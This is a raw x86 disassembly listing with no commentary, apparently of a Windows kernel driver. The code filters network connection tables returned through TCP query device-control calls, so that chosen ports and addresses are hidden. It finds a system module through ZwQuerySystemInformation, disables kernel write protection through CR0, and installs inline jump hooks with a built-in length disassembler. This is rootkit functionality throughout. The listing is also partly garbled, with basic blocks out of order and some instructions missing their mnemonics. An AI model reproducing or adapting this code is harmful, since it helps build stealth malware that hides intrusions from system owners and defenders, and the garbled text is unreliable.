cmp eax edx
je 0x1182c
cmp [ ebp + 0x14 ] 0x120003
mov ecx [ eax + 0x4 ]
push esi
push edi
mov [ ebp + 0x10 ] ecx
jne 0x116e0
cmp [ ebp + 0x14 ] 0x12001b
jne 0x1182a
cmp [ ebp + 0xc ] 0x14
jb 0x1182a
pop edi
pop esi
cmp ecx 0x3c
jne 0x1182a
cmp ecx 0x14
jb 0x1182a
mov eax [ ebx + 0x28 ]
mov ecx [ ebx + 0x30 ]
mov esi [ ebx + 0x18 ]
mov [ ebp - 0x10 ] eax
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0xc ] esi
mov [ ebp + 0x8 ] edx
cmp [ ebx + 0x38 ] edx
jbe 0x1182a
mov eax [ ebp + 0x8 ]
mov eax [ eax + 0x10 ]
sub eax 0x101
je 0x11645
mov [ ebp + 0x10 ] eax
mov [ ebp + 0x14 ] eax
mov [ ebp + 0x18 ] ecx
mov edi esi
mov [ ebp - 0x4 ] esi
mov [ ebp + 0x14 ] edx
mov eax ecx
push 0x14
xor edx edx
pop ecx
div ecx
mov [ ebp - 0x4 ] eax
test eax eax
jbe 0x116d2
dec eax
je 0x115ab
mov eax [ ebx + 0x38 ]
imul eax eax 0x38
lea esi [ eax + esi - 0x38 ]
push 0xe
pop ecx
[ edi ] [ esi ]
mov eax [ ebx + 0x38 ]
mov ecx [ ebp - 0x8 ]
mov edi [ ebp + 0x18 ]
shl eax 0x5
lea esi [ eax + ecx - 0x20 ]
push 0x8
pop ecx
[ edi ] [ esi ]
cmp [ 0x12f2c ] 0x1db1
mov eax [ ebx + 0x38 ]
mov ecx [ ebp - 0x10 ]
jae 0x117a1
cmp [ ebp + 0xf ] al
je 0x11809
mov eax [ ebp + 0x10 ]
mov ecx [ ebp + 0x18 ]
mov [ ecx + 0x4 ] eax
jmp 0x1182a
mov edi ebx
mov [ ebp + 0x8 ] ebx
mov [ ebp + 0x14 ] edx
mov eax ecx
push 0x18
xor edx edx
pop ecx
div ecx
mov [ ebp - 0x4 ] eax
test eax eax
jbe 0x116d2
sub eax 0xe
jne 0x116d2
mov edi [ ebp + 0x10 ]
shl eax 0x4
lea esi [ eax + ecx - 0x10 ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
mov edx [ ebx + 0x38 ]
xor eax eax
shl edx 0x4
lea edi [ edx + ecx - 0x10 ]
stosd [ edi ]
mov edi [ ebp + 0x14 ]
imul eax eax 0xc
lea esi [ eax + ecx - 0xc ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
mov edx [ ebx + 0x38 ]
xor eax eax
imul edx edx 0xc
lea edi [ edx + ecx - 0xc ]
jmp 0x117bc
inc [ ebp + 0x8 ]
mov eax [ ebp + 0x8 ]
add [ ebp + 0x18 ] 0x20
add [ ebp + 0x14 ] 0xc
add [ ebp + 0x10 ] 0x10
add edi 0x38
mov [ ebp - 0x4 ] edi
cmp eax [ ebx + 0x38 ]
jb 0x11722
mov eax [ ebp - 0x4 ]
and [ ebp - 0x24 ] 0x0
imul eax eax 0x14
dec [ ebp + 0x14 ]
sub [ ebp + 0x8 ] 0x14
sub [ ebp + 0x10 ] 0x14
cmp [ ebp - 0x4 ] 0x1
push 0x5
lea eax [ eax + ebx - 0x14 ]
pop ecx
mov esi eax
[ edi ] [ esi ]
push 0x5
pop ecx
lea esi [ ebp - 0x24 ]
mov edi eax
[ edi ] [ esi ]
jbe 0x116d2
test al al
je 0x116b7
mov edi ebx
mov [ ebp + 0x8 ] ebx
mov eax ecx
mov ecx 0xa8
div ecx
mov [ ebp - 0x4 ] eax
test edx edx
jne 0x116d2
movzx eax [ edi + 0x2 ]
push 0x1
push eax
push [ edi + 0x4 ]
call 0x12274
mov [ ebp + 0xf ] al
movzx eax [ edi + 0x1e ]
push 0x0
push eax
push [ edi + 0x20 ]
call 0x12274
test al al
jne 0x11750
mov ecx [ ebp - 0xc ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
mov eax [ ebx + 0x38 ]
imul eax eax 0x38
push 0x38
lea eax [ eax + ecx - 0x38 ]
push 0x0
push eax
call 0x1234e
mov edx [ ebx + 0x38 ]
mov esi [ ebp - 0x8 ]
sub [ ebp - 0x4 ] 0x38
sub [ ebp + 0x18 ] 0x20
sub [ ebp + 0x14 ] 0xc
sub [ ebp + 0x10 ] 0x10
add esp 0xc
shl edx 0x5
push 0x8
xor eax eax
dec [ ebp + 0x8 ]
lea edi [ edx + esi - 0x20 ]
mov esi [ ebp - 0xc ]
pop ecx
[ edi ]
dec [ ebx + 0x38 ]
mov edi [ ebp - 0x4 ]
mov edi [ ebp + 0x8 ]
mov eax [ ebp + 0x10 ]
push 0x14
xor edx edx
pop ecx
div ecx
inc [ ebp + 0x14 ]
add edi 0x14
mov [ ebp + 0x8 ] edi
mov [ ebp - 0x4 ] eax
cmp [ ebp + 0x14 ] eax
jb 0x1165d
mov eax [ ebp - 0x4 ]
and [ ebp - 0x28 ] 0x0
imul eax eax 0x18
dec [ ebp + 0x14 ]
sub [ ebp + 0x8 ] 0x18
sub [ ebp + 0x10 ] 0x18
cmp [ ebp - 0x4 ] 0x1
push 0x6
lea eax [ eax + ebx - 0x18 ]
pop ecx
mov esi eax
[ edi ] [ esi ]
push 0x6
pop ecx
lea esi [ ebp - 0x28 ]
mov edi eax
[ edi ] [ esi ]
jbe 0x116d2
test al al
je 0x11625
and [ ebp + 0x14 ] edx
test eax eax
jbe 0x116d2
push 0x1
push [ edi + 0x8 ]
push [ edi + 0x4 ]
call 0x12274
push 0x0
push [ edi + 0x10 ]
mov [ ebp + 0xf ] al
push [ edi + 0xc ]
call 0x12274
cmp [ ebp + 0xf ] 0x0
jne 0x11684
mov edi [ ebp + 0x8 ]
mov eax [ ebp + 0x10 ]
push 0x18
xor edx edx
pop ecx
div ecx
inc [ ebp + 0x14 ]
add edi 0x18
mov [ ebp + 0x8 ] edi
mov [ ebp - 0x4 ] eax
cmp [ ebp + 0x14 ] eax
jb 0x115c7
mov edi ebx
mov [ ebp + 0x8 ] ebx
push 0x1
push [ edi + 0x8 ]
push [ edi + 0x4 ]
call 0x12274
push 0x0
push [ edi + 0x10 ]
mov [ ebp + 0xf ] al
push [ edi + 0xc ]
call 0x12274
cmp [ ebp + 0xf ] 0x0
jne 0x115ee
jmp 0x116d2
mov eax [ ebp - 0x4 ]
and [ ebp - 0xcc ] 0x0
imul eax eax 0xa8
dec [ ebp + 0x14 ]
lea eax [ eax + ebx - 0xa8 ]
push 0x2a
pop ecx
mov esi eax
[ edi ] [ esi ]
mov edi eax
mov eax 0xa8
sub [ ebp + 0x8 ] eax
sub [ ebp + 0x10 ] eax
cmp [ ebp - 0x4 ] 0x1
push 0x2a
pop ecx
lea esi [ ebp - 0xd0 ]
[ edi ] [ esi ]
jb 0x116d2
test al al
je 0x11586
mov edi [ ebp + 0x8 ]
mov eax [ ebp + 0x10 ]
mov ecx 0xa8
xor edx edx
div ecx
inc [ ebp + 0x14 ]
add edi ecx
mov [ ebp + 0x8 ] edi
mov [ ebp - 0x4 ] eax
cmp [ ebp + 0x14 ] eax
jb 0x11519
push 0x1
push [ edi + 0xc ]
push [ edi + 0x8 ]
call 0x12274
push 0x0
push [ edi + 0x14 ]
mov [ ebp + 0xf ] al
push [ edi + 0x10 ]
call 0x12274
cmp [ ebp + 0xf ] 0x0
jne 0x11540
jmp 0x116d2
sub_11836
mov edi edi
push ebp
mov ebp esp
push ebx
xor bl bl
cmp [ ebp + 0x8 ] 0x120003
jne 0x11886
mov al bl
pop ebx
pop ebp
retn 0xc
push esi
mov esi [ ebp + 0xc ]
test esi esi
je 0x11885
pop esi
cmp [ ebp + 0x10 ] 0x24
jne 0x11885
push esi
call [ 0x124c0 ]
test al al
je 0x11885
cmp [ esi ] 0x400
jne 0x11885
mov esi [ esi + 0x10 ]
cmp esi 0x101
je 0x11883
mov bl 0x1
cmp esi 0x102
je 0x11883
cmp esi 0x110
jne 0x11885
sub_11892
mov edi edi
push ebp
mov ebp esp
push ebx
xor bl bl
cmp [ ebp + 0x8 ] 0x12001b
jne 0x11909
mov al bl
pop ebx
pop ebp
retn 0xc
push esi
mov esi [ ebp + 0xc ]
test esi esi
je 0x11908
pop esi
cmp [ ebp + 0x10 ] 0x3c
jne 0x11908
push edi
mov edi [ 0x124c0 ]
push esi
call edi
test al al
je 0x11907
pop edi
cmp [ esi + 0x1c ] 0x38
jne 0x11907
cmp [ esi + 0x34 ] 0x20
jne 0x11907
mov eax [ 0x12f2c ]
cmp eax 0x1db0
jbe 0x118dd
cmp eax 0x1db1
jae 0x118ea
cmp [ esi + 0x2c ] 0x10
jne 0x11907
push [ esi + 0x18 ]
call edi
test al al
je 0x11907
cmp [ esi + 0x2c ] 0xc
jne 0x11907
push [ esi + 0x28 ]
call edi
test al al
je 0x11907
push [ esi + 0x30 ]
call edi
test al al
je 0x11907
mov bl 0x1
sub_11916
mov edi edi
push ebp
mov ebp esp
mov eax [ ebp + 0x8 ]
test eax eax
je 0x1198a
xor al al
cmp [ ebp + 0xc ] 0x8
jb 0x1198a
movzx ecx [ eax + 0x6 ]
push ebx
xor bl bl
dec ecx
je 0x11963
movzx ecx [ eax + 0x7 ]
movzx dx [ eax + 0x5 ]
push ecx
mov cx [ eax + 0x4 ]
shl cx 0x8
xor cx dx
movzx ecx cx
push ecx
push [ eax ]
call 0x12126
dec ecx
je 0x11941
pop ebp
retn 0x8
movzx ecx [ eax + 0x7 ]
movzx dx [ eax + 0x5 ]
push ecx
mov cx [ eax + 0x4 ]
shl cx 0x8
xor cx dx
movzx ecx cx
push ecx
push [ eax ]
call 0x121f0
jmp 0x11983
dec ecx
jne 0x11985
mov bl al
mov al bl
pop ebx
jmp 0x1198c
inc bl
call 0x122d8
jmp 0x11985
sub_11996
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push edi
lea eax [ ebp - 0x8 ]
push eax
xor edi edi
push edi
push edi
push 0xb
mov [ ebp - 0x8 ] edi
mov [ ebp - 0x1 ] 0x0
call 0x12366
cmp eax 0xc0000004
je 0x119c2
push ebx
mov ebx [ ebp - 0x8 ]
push esi
cmp ebx edi
ja 0x119d0
xor al al
jmp 0x11a70
push 0x70737049
push ebx
push edi
call [ 0x124ec ]
mov esi eax
cmp esi edi
je 0x11a6b
mov ebx 0x1000
pop edi
leave
retn 0xc
mov al [ ebp - 0x1 ]
pop esi
pop ebx
lea eax [ ebp - 0x8 ]
push eax
push ebx
push esi
push 0xb
call 0x12366
test eax eax
jl 0x11a63
push edi
push esi
call [ 0x124e0 ]
cmp [ ebp + 0x8 ] edi
jne 0x11a0a
cmp [ esi ] edi
jbe 0x11a63
mov eax [ esi + 0xc ]
mov ecx [ ebp + 0xc ]
mov [ ecx ] eax
mov eax [ esi + 0x10 ]
jmp 0x11a5a
lea ebx [ esi + 0x20 ]
mov ecx [ ebp + 0x10 ]
mov [ ebp - 0x1 ] 0x1
mov [ ecx ] eax
mov eax ebx
inc eax
jmp 0x11a25
mov edx [ ebp + 0xc ]
imul edi edi 0x11c
lea eax [ edi + esi ]
mov ecx [ eax + 0xc ]
mov [ edx ] ecx
mov eax [ eax + 0x10 ]
xor edi edi
inc edi
add ebx 0x11c
cmp edi [ esi ]
jb 0x11a11
push [ ebp + 0x8 ]
push eax
call [ 0x124e4 ]
pop ecx
pop ecx
test eax eax
je 0x11a44
push 0x5c
push ebx
call [ 0x124e8 ]
pop ecx
pop ecx
test eax eax
je 0x11a23
xor edi edi
jmp 0x11a63
sub_11a7a
mov edi edi
push ebp
mov ebp esp
mov eax [ 0x124a4 ]
movzx ecx [ eax ]
push ebx
push esi
xor eax eax
push edi
cmp ecx 0xa28
je 0x11a9c
cmp [ ebp + 0xc ] eax
je 0x11ae0
cmp ecx 0xece
jne 0x11ad7
xor ebx ebx
cmp eax ebx
je 0x11ad5
xor ecx ecx
cmp ecx 0x12574
je 0x11ae0
pop edi
pop esi
pop ebx
pop ebp
retn 0x8
xor eax eax
mov eax [ eax - 0x4 ]
mov [ 0x126be ] eax
cmp [ ebp + 0xc ] ebx
je 0x11ad5
mov edx [ ebp + 0x8 ]
xor ebx ebx
cmp [ ebp + 0xc ] eax
jbe 0x11ad5
xor eax eax
cmp eax 0x126bc
je 0x11ad5
push 0x5
pop ecx
mov edi 0x12574
mov esi edx
xor eax eax
[ esi ] [ edi ]
je 0x11aca
mov edx [ ebp + 0x8 ]
cmp [ ebp + 0xc ] eax
jbe 0x11ad5
test eax eax
je 0x11ade
sbb eax eax
sbb eax 0xffffffff
push 0x6
pop ecx
mov edi 0x126bc
mov esi edx
xor eax eax
[ esi ] [ edi ]
je 0x11b19
mov eax edx
inc edx
inc ebx
cmp ebx [ ebp + 0xc ]
jb 0x11ab5
test eax eax
je 0x11b26
sbb eax eax
sbb eax 0xffffffff
mov eax edx
jmp 0x11ad7
inc edx
inc ebx
cmp ebx [ ebp + 0xc ]
jb 0x11b04
jmp 0x11ad5
sub_11b30
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
push [ esi + 0x10 ]
call 0x120ce
test al al
jne 0x11b51
mov al 0x1
push [ esi + 0xc ]
call 0x120ce
test al al
je 0x11b53
pop esi
pop ebp
retn 0x4
sub_11b5e
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
mov eax [ esi + 0x8 ]
push [ eax + 0x8 ]
call 0x11b30
xor ecx ecx
test al al
sete cl
mov [ esi + 0x1c ] ecx
pop esi
pop ebp
retn
sub_11b84
mov edi edi
push ebp
mov ebp esp
sub esp 0x18
mov eax [ 0x12ee0 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov eax [ 0x124a4 ]
movzx ecx [ eax ]
mov al [ 0x12f30 ]
and [ ebp - 0x14 ] 0x0
and [ ebp - 0x18 ] 0x0
push ebx
push esi
push edi
mov esi 0x12404
lea edi [ ebp - 0x10 ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
xor bl bl
movsw [ edi ] [ esi ]
test al al
je 0x11bc4
cmp ecx 0xece
ja 0x11c14
mov bl al
jmp 0x11c14
mov ecx [ ebp - 0x4 ]
pop edi
pop esi
mov al bl
xor ecx ebp
pop ebx
call 0x1230d
leave
retn
dec [ ebp - 0x10 ]
dec [ ebp - 0xf ]
lea eax [ ebp - 0x18 ]
push eax
lea eax [ ebp - 0x14 ]
push eax
lea eax [ ebp - 0x10 ]
push eax
mov [ ebp - 0xb ] 0x2e
call 0x11996
mov bl al
test bl bl
je 0x11c14
push [ ebp - 0x18 ]
push [ ebp - 0x14 ]
call 0x11a7a
mov [ 0x12f34 ] eax
test eax eax
je 0x11c14
push 0x11b5e
push eax
call 0x11d8a
mov bl al
mov [ 0x12f30 ] bl
sub_11c2a
pushad
mov esi [ esp + 0x24 ]
mov ecx [ esp + 0x28 ]
xor edx edx
xor eax eax
and dl 0xf7
mov al [ ecx ]
inc ecx
or edx [ esi + eax * 4 ]
test dl 0x8
jne 0x11c37
cmp al 0xf6
je 0x11c7f
or dh 0x40
test [ ecx ] 0x38
jne 0x11c55
cmp al 0xf7
je 0x11c7f
test dh 0x80
jne 0x11cac
or dh 0x80
jmp 0x11c55
cmp al 0xcd
je 0x11c8c
xor dh 0x20
test al 0x1
jne 0x11c5a
test dh 0x40
jne 0x11cd2
or dh 0x1
cmp [ ecx ] 0x20
jne 0x11c55
cmp al 0xf
je 0x11c99
xor dh 0x21
jmp 0x11c5a
mov al [ ecx ]
inc ecx
mov ah al
and ax 0xc007
cmp ah 0xc0
je 0x11c5f
test dl 0x20
jne 0x11cb8
or dh 0x4
jmp 0x11c55
mov al [ ecx ]
inc ecx
or edx [ esi + eax * 4 + 0x400 ]
cmp edx 0xffffffff
jne 0x11c55
test dl 0x10
jne 0x11d16
xor dl 0x2
test dl 0x10
jne 0x11c64
test dh 0x20
jne 0x11cc5
mov eax edx
jmp 0x11c79
cmp ax 0x6
je 0x11d2a
cmp al 0x4
jne 0x11cf2
xor dl 0x6
jmp 0x11c64
xor dh 0x2
test dh 0x10
jne 0x11c69
mov eax ecx
sub eax [ esp + 0x28 ]
and edx 0x707
add al dl
add al dh
mov [ esp + 0x1c ] eax
popad
retn
or dl 0x2
jmp 0x11c5f
cmp ah 0x40
je 0x11d0e
cmp ah 0x40
je 0x11d0e
mov al [ ecx ]
inc ecx
and al 0x7
xor dh 0x6
jmp 0x11c69
or dl 0x1
jmp 0x11c5f
cmp ah 0x80
jne 0x11c5f
cmp ah 0x80
je 0x11d06
or dl 0x4
jmp 0x11c5f
cmp ax 0x5
jne 0x11c5f
sub_11d56
mov edi edi
push ebp
mov ebp esp
push esi
push [ ebp + 0x8 ]
call 0x11d38
mov esi eax
cmp eax [ ebp + 0xc ]
jae 0x11d7d
mov eax esi
pop esi
pop ebp
retn 0x8
add [ ebp + 0x8 ] eax
push [ ebp + 0x8 ]
call 0x11d38
add esi eax
cmp esi [ ebp + 0xc ]
jb 0x11d6b
sub_11d8a
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
push esi
mov esi [ 0x124c0 ]
push edi
push [ ebp + 0x8 ]
xor eax eax
and [ ebp - 0x4 ] eax
lea edi [ ebp - 0xb ]
mov [ ebp - 0xc ] 0x0
stosd [ edi ]
call esi
test al al
je 0x11ed6
xor al al
mov edi [ ebp + 0xc ]
push edi
call esi
test al al
je 0x11ed6
push ebx
push 0x5
push [ ebp + 0x8 ]
call 0x11d56
push 0x1240e
push 0x2a
push 0x0
mov ebx eax
call [ 0x124ec ]
mov esi eax
sub eax [ ebp + 0x8 ]
sub edi esi
sub eax 0x5
mov [ ebp - 0xb ] eax
sub edi 0xd
mov [ esi + 0x9 ] edi
mov [ esi ] 0x60
mov [ esi + 0x1 ] 0x9c
mov [ esi + 0x2 ] 0xc083c48b
mov eax 0x5004
mov [ esi + 0x6 ] ax
mov [ esi + 0x8 ] 0xe8
mov [ esi + 0xd ] 0x58
mov [ esi + 0xe ] 0x9d
mov [ esi + 0xf ] 0x61
lea ecx [ esi + 0x10 ]
mov edi ecx
mov eax 0x90909090
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
push ebx
push [ ebp + 0x8 ]
stosd [ edi ]
push ecx
mov [ ebp - 0xc ] 0xe9
stosd [ edi ]
call 0x1235a
mov [ ebp + 0xc ] 0x74
mov [ ebp + 0xd ] 0x2
mov [ ebp + 0xe ] 0x3b
mov [ ebp + 0xf ] 0xc7
mov eax [ ebp + 0xc ]
add esp 0xc
mov [ ebx + esi + 0x10 ] eax
mov ecx [ ebp + 0x8 ]
lea eax [ ebx + ecx ]
mov [ esi + 0x24 ] 0x68
mov [ esi + 0x25 ] eax
mov [ esi + 0x29 ] 0xc3
cli
mov eax cr0
and eax 0xfffeffff
mov cr0 eax
mov edi ecx
lea esi [ ebp - 0xc ]
add ebx 0xfffffffb
movsd [ edi ] [ esi ]
push ebx
add ecx 0x5
push 0x90
push ecx
movsb [ edi ] [ esi ]
call 0x1234e
add esp 0xc
mov eax cr0
or eax 0x10000
mov cr0 eax
sti
mov al 0x1
pop ebx
jmp 0x11ed8
push edi
call 0x11d38
cmp eax 0x5
jne 0x11e83
pop edi
pop esi
leave
retn 0x8
add [ ebp - 0x4 ] eax
cmp [ ebp - 0x4 ] 0x14
jb 0x11e4f
mov cl [ edi ]
cmp cl 0xe8
je 0x11e72
mov eax [ ebp - 0x4 ]
lea edi [ esi + eax + 0x10 ]
cmp [ edi ] 0x90
je 0x11e8c
mov edx [ ebp + 0x8 ]
mov ecx [ ebp - 0x4 ]
sub edx esi
lea ecx [ ecx + esi + 0x11 ]
sub edx 0x10
add [ ecx ] edx
cmp cl 0xe9
jne 0x11e83
sub_11ee4
cmp [ 0x12f6f ] 0x0
jne 0x11f22
retn
push 0x37
push 0x0
push 0x12f38
call 0x1234e
add esp 0xc
cmp [ 0x12f90 ] 0x0
jne 0x11f1b
mov [ 0x12f6f ] 0x1
push 0x0
push 0x12f70
call [ 0x124f4 ]
mov [ 0x12f90 ] 0x1
sub_11f50
mov edi edi
push ebp
mov ebp esp
push ebx
push esi
mov esi [ ebp + 0x8 ]
xor ebx ebx
cmp esi ebx
jne 0x11f67
push edi
push ebx
push ebx
push ebx
push ebx
push 0x12f70
mov [ ebp + 0xb ] bl
call [ 0x124fc ]
mov eax [ esi + 0x4 ]
xor edi edi
xor ecx ecx
xor al al
jmp 0x12030
mov cl [ esi + 0xa ]
cmp cl bl
je 0x11fc4
add ecx 0xb
inc edi
cmp ecx 0x37
jb 0x11f81
pop esi
pop ebx
pop ebp
retn 0x4
imul edi edi 0xb
xor eax eax
add edi 0x12f38
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
mov eax edi
imul eax eax 0xb
mov [ eax + 0x12f42 ] cl
mov ecx [ esi + 0x4 ]
mov [ eax + 0x12f3c ] ecx
mov cx [ esi + 0x8 ]
mov [ eax + 0x12f40 ] cx
mov ecx [ esi ]
mov [ eax + 0x12f38 ] ecx
jmp 0x11fd4
cmp [ ecx + 0x12f3c ] eax
je 0x11f94
jmp 0x11fd8
push ebx
push 0x12f70
call [ 0x124f8 ]
mov al [ ebp + 0xb ]
cmp [ ecx + 0x12f3c ] ebx
je 0x11ff5
mov [ ebp + 0xb ] 0x1
xor eax eax
xor ecx ecx
pop edi
mov cl [ esi + 0xa ]
imul eax eax 0xb
mov [ eax + 0x12f42 ] cl
mov ecx [ esi + 0x4 ]
mov [ eax + 0x12f3c ] ecx
mov cx [ esi + 0x8 ]
mov [ eax + 0x12f40 ] cx
mov ecx [ esi ]
mov [ eax + 0x12f38 ] ecx
mov [ ebp + 0xb ] 0x1
add ecx 0xb
inc eax
cmp ecx 0x37
jb 0x11fdd
cmp [ ebp + 0xb ] bl
jne 0x12021
jmp 0x12021
sub_1203c
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
push edi
xor edi edi
cmp esi edi
jne 0x12050
cmp [ esi + 0xa ] 0x0
jne 0x1204c
xor al al
jmp 0x120c3
push ebx
push edi
push edi
push edi
push edi
mov ebx 0x12f70
push ebx
mov [ ebp + 0xb ] 0x0
call [ 0x124fc ]
mov esi [ esi + 0x4 ]
cmp esi edi
jne 0x12088
pop edi
pop esi
pop ebp
retn 0x4
xor ecx ecx
xor eax eax
push 0x37
push edi
push 0x12f38
mov [ ebp + 0xb ] 0x1
call 0x1234e
add esp 0xc
jmp 0x120b7
mov edi ecx
imul edi edi 0xb
add edi 0x12f38
xor eax eax
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
mov [ ebp + 0xb ] 0x1
xor edi edi
add eax 0xb
inc ecx
cmp eax 0x37
jb 0x1208c
push edi
push ebx
call [ 0x124f8 ]
mov al [ ebp + 0xb ]
pop ebx
cmp [ eax + 0x12f3c ] esi
je 0x1209f
jmp 0x120b7
sub_120ce
mov edi edi
push ebp
mov ebp esp
mov edx [ ebp + 0x8 ]
xor eax eax
cmp edx eax
jne 0x120e0
xor ecx ecx
xor al al
jmp 0x120fe
add ecx 0xb
cmp ecx 0x37
jb 0x120e2
cmp [ ecx + 0x12f42 ] al
jne 0x120fc
pop ebp
retn 0x4
cmp [ ecx + 0x12f3c ] edx
jne 0x120f2
jmp 0x120fe
mov al 0x1
sub_12126
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
cmp [ ebp + 0xc ] 0x1
push ebx
jb 0x121e4
xor al al
mov bl [ ebp + 0x10 ]
test bl bl
jne 0x1214a
push esi
mov esi 0x13010
push edi
mov ecx esi
mov [ ebp + 0x13 ] 0x0
xor edi edi
call [ 0x1248c ]
mov [ ebp - 0x1 ] al
mov [ ebp - 0x8 ] 0x1
mov ecx 0x12f9f
cmp [ ebp + 0x8 ] 0x1
jb 0x121e4
cmp edi 0x1
jae 0x12196
mov dx [ ebp + 0xc ]
cmp [ ecx + 0x4 ] dx
jne 0x12184
inc [ ebp - 0x8 ]
add ecx 0x7
cmp ecx 0x1300f
jl 0x1216e
test eax eax
jne 0x12196
cmp bl [ ecx + 0x6 ]
je 0x121ce
mov eax [ ecx ]
cmp eax [ ebp + 0x8 ]
jne 0x12184
cmp edi 0x1
jb 0x121d2
cmp ax [ ecx + 0x4 ]
jne 0x12196
mov [ ebp + 0x13 ] 0x1
mov dl [ ebp - 0x1 ]
mov ecx esi
call [ 0x12480 ]
mov al [ ebp + 0x13 ]
pop edi
pop esi
jmp 0x121e6
mov eax [ ebp + 0x8 ]
mov ecx edi
imul ecx ecx 0x7
mov [ ecx + 0x12f98 ] eax
mov ax [ ebp + 0xc ]
mov [ ecx + 0x12f9e ] bl
mov [ ecx + 0x12f9c ] ax
inc [ 0x12f98 ]
mov edi [ ebp - 0x8 ]
pop ebx
leave
retn 0xc
sub_121f0
mov edi edi
push ebp
mov ebp esp
cmp [ ebp + 0xc ] 0x1
jae 0x12200
push ebx
push esi
push edi
mov edi 0x13010
mov ecx edi
xor bl bl
call [ 0x1248c ]
xor ecx ecx
inc ecx
mov esi 0x12f9f
xor al al
jmp 0x1226b
add esi 0x7
inc ecx
cmp esi 0x1300f
jl 0x1221a
mov edx [ ebp + 0x8 ]
cmp edx [ esi ]
jne 0x12233
pop ebp
retn 0xc
mov dx [ ebp + 0xc ]
cmp dx [ esi + 0x4 ]
jne 0x12233
jmp 0x1225c
mov dl [ ebp + 0x10 ]
cmp dl [ esi + 0x6 ]
je 0x12241
mov dl al
mov ecx edi
call [ 0x12480 ]
pop edi
pop esi
mov al bl
pop ebx
imul ecx ecx 0x7
and [ ecx + 0x12f98 ] 0x0
xor edx edx
mov [ ecx + 0x12f9c ] dx
dec [ 0x12f98 ]
mov bl 0x1
sub_12274
mov edi edi
push ebp
mov ebp esp
cmp [ ebp + 0xc ] 0x1
jae 0x12283
push ebx
push esi
mov esi 0x13010
mov ecx esi
xor bl bl
call [ 0x1248c ]
mov ecx 0x12f9f
xor al al
jmp 0x122ce
add ecx 0x7
cmp ecx 0x1300f
jl 0x12299
mov edx [ ebp + 0x8 ]
cmp edx [ ecx ]
jne 0x122b1
pop ebp
retn 0xc
movzx edx [ ecx + 0x4 ]
cmp [ ebp + 0xc ] edx
jne 0x122b1
jmp 0x122c0
mov dl [ ebp + 0x10 ]
cmp dl [ ecx + 0x6 ]
je 0x122be
mov dl al
mov ecx esi
call [ 0x12480 ]
pop esi
mov al bl
pop ebx
mov bl 0x1
sub_122d8
mov edi edi
push ebx
push esi
mov esi 0x13010
mov ecx esi
call [ 0x1248c ]
push 0x77
push 0x0
push 0x12f98
mov bl al
call 0x1234e
add esp 0xc
mov ecx esi
pop esi
mov dl bl
pop ebx
jmp [ 0x12480 ]
sub_13085
mov eax [ 0x12ee0 ]
mov ecx 0xbb40e64e
test eax eax
je 0x13097
mov eax [ 0x124c4 ]
mov eax [ eax ]
xor eax 0x12ee0
mov [ 0x12ee0 ] eax
jne 0x130b1
cmp eax ecx
jne 0x130b1
not eax
mov [ 0x12ee4 ] eax
retn
mov eax ecx
mov [ 0x12ee0 ] eax
sub_11d32
retn
sub_11d38
mov edi edi
push ebp
mov ebp esp
push [ ebp + 0x8 ]
push 0x126c8
call 0x11c2a
add esp 0x8
pop ebp
retn 0x4
sub_11f28
cmp [ 0x12f6f ] 0x0
je 0x11f49
retn
push 0x37
push 0x0
push 0x12f38
call 0x1234e
add esp 0xc
mov [ 0x12f6f ] 0x0
sub_12108
cmp [ 0x1300f ] 0x0
mov al 0x1
jne 0x1211f
retn
and [ 0x13010 ] 0x0
mov [ 0x1300f ] al
sub_1230d
cmp ecx [ 0x12ee0 ]
jne 0x12318
jmp 0x12322
retn 0x0
sub_12322
mov edi edi
push ebp
mov ebp esp
push ecx
mov [ ebp - 0x4 ] ecx
push 0x0
push [ 0x12ee4 ]
push [ 0x12ee0 ]
push [ ebp - 0x4 ]
push 0xf7
call [ 0x12500 ]
int3
memset
jmp [ 0x12504 ]
memcpy
jmp [ 0x124dc ]
ZwQuerySystemInformation
jmp [ 0x124f0 ]
_start
mov edi edi
push ebp
mov ebp esp
call 0x13085
pop ebp
jmp 0x10516
